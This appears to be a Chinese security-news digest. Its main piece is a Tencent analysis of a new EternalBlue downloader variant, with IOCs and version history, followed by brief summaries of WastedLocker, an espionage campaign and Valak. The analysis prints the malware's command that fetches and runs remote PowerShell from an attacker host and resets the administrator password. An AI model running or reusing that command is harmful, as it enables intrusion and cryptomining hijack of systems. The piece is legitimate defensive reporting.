lsass.txt是开源挖矿程序XMRig编译生成的挖矿木马,挖矿配置文件保存在资源文件“PEIZ”中,挖矿使用矿池pool.supportxmr.com:3333,门罗币钱包: 43TosPcYFbmi7GuQSQZhXHP5XhZ8K2w77XtvnP5m5pMGQGCmhgeq3ZTcBgrm62NZfzgG19fj5nEEZXoypbHHnm6SRJsLpKw BasedMiner目前已挖矿获得17XMR,折合人民币8000元。 IOCs Doamin www[.]bjcptj.com IP 221.212.96.254 Md5 Test.txt 97f35b7658f61380720073e86f2ada59 lsass.txt cfe6457baa60685a2f838e65705c02a1 new.exe f31a4049c6ed9f6f1395bbd5fc7c136f ju.exe c58cdbc08b03c24e6ae3647aeeeb2fe8 tu.exe aaabcbc46344b2e396a0f660c9d68724 8639.exe e8f0591076498c50e78504b4fb2055d3 URL http[:]//221.212.96.254:14563/8639.exe http[:]//221.212.96.254:14563/tu.exe http[:]//221.212.96.254:14563/ju.exe http[:]//221.212.96.254:14563/new.exe http[:]//221.212.96.254:14563/lsass.txt http[:]//221.212.96.254:14563/Test.txt http[:]//bjcptj.com/ju.exe http[:]//bjcptj.com:3215/8639.exe http[:]//bjcptj.com:3215/tu.exe

永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种,此次变种利用Python打包EXE可执行文件进行攻击,该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示,永恒之蓝下载器最新变种出现之后便迅速传播,目前已感染约1.5万台服务器,中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中,曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后,该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中,并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播,同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿,会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单,对企业网络资产进行安全检测,以及时消除永恒之蓝下载器木马的破坏活动: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务(VSS)已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 附:永恒之蓝下载器木马历次版本更新情况如下: 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新,新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名,篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击,其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中,将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留: 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件(使用新冠病毒疫情相关主题) 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码,负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码,解密后的内容主要完成以下功能: 生成4到8位字符组成的随机字符串作为文件名<random>.exe; 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe; 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat,如果不符合权限则创建C:\Windows\Temp\\tt.vbs,通过VBS脚本代码创建计划任务“<random>.exe “,同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat(拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0)实际上是由Python代码打包的扫描攻击模块,与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似(参考https://www.freebuf.com/news/192015.html)。 该病毒在后来的逐步发展过程中,逐步将攻击代码转移到了Powershell实现,并且利用计划任务来动态获取和启动,不会在磁盘上留下文件,也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块,可能是因为其功能不断扩展,需要将一部分代码进行分割,切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同,此处不再分析,分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下,另外还会执行$IPC、SMB、mssql弱口令爆破攻击: 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp; 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户; 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码,首先检测系统是否安装了以下杀软,如有调用卸载程序进行卸载: Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务,定期下载和执行a.jsp(a.jsp继续下载和执行挖矿和攻击模块)。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接: 《“黑球”行动再升级,SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

WastedLocker:赛门铁克确定了针对美国组织的攻击浪潮

Broadcom旗下的赛门铁克发现并警告用户:攻击者试图部署WastedLocker勒索软件,对美国公司进行了一系列攻击。这些攻击的最终目标是通过对受害者的大多数计算机和服务器进行加密来削弱受害者的IT基础架构,以要求获得数百万美元的赎金,目前至少有31个组织受到了攻击,这意味着攻击者已经破坏了目标组织的网络,并且正在为勒索软件攻击奠定基础。 是一种相对较新的定向勒索软件,在NCC Group发布之前就已被记录,而赛门铁克正在对受影响的网络进行扩展。WastedLocker被归因于臭名昭著的“Evil Corp”网络犯罪组织,Evil Corp曾与Dridex银行木马和BitPaymer勒索软件相关联,勒索金额高达数千万美元。两名涉嫌参与该组织的俄罗斯男子在美国对他们进行了公开起诉。 这些攻击始于一个名为SocGholish的基于javascript的恶意框架,该框架被追踪到超过150个受到威胁的网站伪装成软件进行更新。一旦攻击者进入了受害者的网络,他们就会使用Cobalt Strike恶意软件和一些非本土工具来盗取身份证件,升级特权,然后在网络中进行移动,以便在多台电脑上部署WastedLocker勒索软件。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:symantec-enterprise-blogs,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

针对知名航天和军事公司的攻击活动分析

去年年底,我们发现了针对欧洲和中东地区的航空航天和军事公司的攻击活动,该攻击在2019年9月至2019年12月非常活跃。通过对两家受影响的欧洲公司的深入调查,我们对其攻击活动进行了深入了解,发现了之前从未被记录的恶意软件。 本文将对攻击活动的具体情况进行分析,完整的分析报告可查看白皮书《运营感知:针对欧洲航空航天和军事公司的针对性攻击》。 基于名为Inception.dll的相关恶意软件样本,我们将这些攻击称为“操作感知”,发现这些攻击活动具有很高的针对性。 为了危及目标,攻击者以诱人的虚假工作机会为幌子。在取得信任后,开始部署了自定义的多级恶意软件以及修改过的开源工具。除此之外还采用“陆上生存”策略,滥用合法工具和操作系统功能,使用多种技术来避免检测(其中包括代码签名、定期对恶意软件进行重新编译以及冒充合法公司来进行诈骗)。 我们调查了解到该行动的主要目标是间谍活动。但是在调查的某个案例中发现攻击者试图通过商业电子邮件折衷攻击(BEC)将访问受害者电子邮件帐户的权限货币化。虽然我们没有找到有力的证据将攻击与已知的威胁行为者联系起来,但发现了一些可能与Lazarus集团有联系的线索(其中包括定位目标、开发环境和使用的技术分析)。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:welivesecurity,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Valak 恶意软件与 Gozi ConfCrew 的千丝万缕联系

Valak是使用基于脚本的多阶段恶意软件,该软件劫持电子邮件并嵌入恶意URL附件,以使用无文件脚本来感染设备。 相关摘要 Valak使用了基于脚本的恶意软件,这些恶意软件在广告活动中使用,其与Gozi ConfCrew相关联。 重复的攻击活动导致一些报道将Valak误认为是Gozi。 电子邮件被收集起来并运用在“回复链攻击”中,以专门构建插件“ exchgrabber”来进一步传播。 新发现的名为“ clientgrabber”的插件还用于从注册表中窃取电子邮件凭据。 有关Varak详情请见报告:https://assets.sentinelone.com/labs/sentinel-one-valak-i   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1246/     消息来源:sentinelone,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接